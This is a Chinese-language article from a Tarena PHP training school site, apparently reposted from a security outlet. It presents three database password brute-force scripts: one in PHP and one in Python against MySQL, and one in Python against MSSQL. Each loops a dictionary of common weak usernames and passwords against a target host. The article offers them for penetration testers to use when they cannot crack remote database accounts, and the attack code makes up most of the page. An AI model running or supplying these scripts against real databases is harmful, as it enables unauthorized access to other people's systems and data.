课程咨询 :13623629309

太原PHP培训 > 达内新闻 > MYSQL和MSSQL数据库账号密码猜解脚本PHP版+Python版
  • MYSQL和MSSQL数据库账号密码猜解脚本PHP版+Python版

    发布:指尖安全      来源:指尖安全      时间:2016-10-20

  • MYSQL和MSSQL数据库账号密码猜解脚本PHP版+Python版

    数据库是我们编程过程中经常用的,因此对于他们熟悉是很重要的。太原php培训班为大家讲解一下。

    数据库账号密码猜解脚本PHP+Python

    一、Mysql PHP版本爆破小脚本(注意:从代码可以看出用户名是个变量,一般数据库账号不会变,所以用户名没用数组作为字典。密码是用数组作为字典。字典可根据规矩扩展,破解的成功与失败,就看你扩展的字典强大不强大了。用法:保存代码为MysqlDatabaseBlasting.php,浏览器打开就可使用。 )

    /*

    * authorBearcat 2016-10-5

    */

    MysqlDatabaseBlasting(Mysql账号密码在线爆破工具 V1.0)

    if(@$_POST['submit']){

    $host = @$_POST['host'];

    if($host!=""){

    $username = "root";//用户名字典

    $password = array('','123456','admin','root','ccf304vn'); //密码字典

    echo "

    --------------------爆破状态--------------------

    ";

    echo "密码错误次数:";

    for ($i=0; $i <= count($password); $i++) {

    if(@mysql_connect($host, $username, $password[$i])){

    echo "

    爆破成功--密码-->".@$password[$i]."";

    break;

    }else{

    echo $i."";

    continue;

    }

    }

    echo "

    --------------------爆破结束--------------------

    ";

    }else{

    echo "";

    }

    }

    ?>

    数据库IP地址:

    演示:

    二、Mysql Python版本爆破小脚本,需要安装Python插件MySQL-python.exe,可以看出代码量很少,(注意:里用户名和密码都是类似字典。用法:保存代码为MysqlDatabaseBlasting.pycmd切换到 MysqlDatabaseBlasting.py路径下,并 执行 MysqlDatabaseBlasting.py即可开始破解 )

    import MySQLdb

    #coding=gbk

    #目标IP mysql数据库必须开启3360远程登陆端口

    mysql_username = ('root','test', 'admin', 'user')#账号字典

    common_weak_password = ('','123456','test','root','admin','user')#密码字典

    success = False

    host = "127.0.0.1"#数据库IP地址

    port = 3306

    for username in mysql_username:

    for password in common_weak_password:

    try:

    db = MySQLdb.connect(host, username, password)

    success = True

    if success:

    print username, password

    except Exception, e:

    pass

    演示:

    三、Mssql Python版本爆破小脚本,需要安装 MSSQL-python.exe 可以看出代码量很少,参考二的用法

    import pymssql

    common_weak_password = ('','123456','test','root','admin','user')#密码字典

    mssql_username = ('sa', 'test', 'admin', 'mssql')#账号字典

    success = False

    host = "127.0.0.1"#数据库IP地址

    port = 1443

    for username in mssql_username:

    for password in common_weak_password:

    try:

    db = pymssql.connect(server=host, port=port, user=username, password=password)

    success = True

    if success:

    print username, password

    except Exception, e:

    pass

    说明:看到很多网络安全爱好者,在进行渗透测试的时候,遇到数据库可以远程管理,但是无法破解其账号密码,所以此篇文章就推送几个脚本进行渗透。

    今天就给大家讲这么多吧,喜欢我的内容可以关注或者分享(微信公众平台:tytedu)选择太原达内培训,不再孤军奋战,轻轻松松做IT高薪白领。太原达内培训带领有明确目标的学子迈向成功之路!

上一篇:QQ音乐在线听歌网站系统

下一篇:PHP 中使用 Redis

最新开班日期  |  更多

php高级开发名企定制班(剩2个名额)

php高级开发名企定制班(剩2个名额)

开班日期:12-30

php高级开发周末班(剩5个名额)

php高级开发周末班(剩5个名额)

开班日期:12-30

php高级开发免费试听(剩5个名额)

php高级开发免费试听(剩5个名额)

开班日期:12-30

更多高级开发工程师精品班

更多高级开发工程师精品班

开班日期:12-30

  • 地址:山西省太原市小店区学府街长治路高新国际A座24层
  • 课程培训电话:13623629309     全国服务监督电话:400-827-0010
  • 服务邮箱 ts@tedu.cn
  • 2001-2016 达内国际公司(TARENA INTERNATIONAL,INC.) 版权所有 京ICP证08000853号-56

    在线客服系统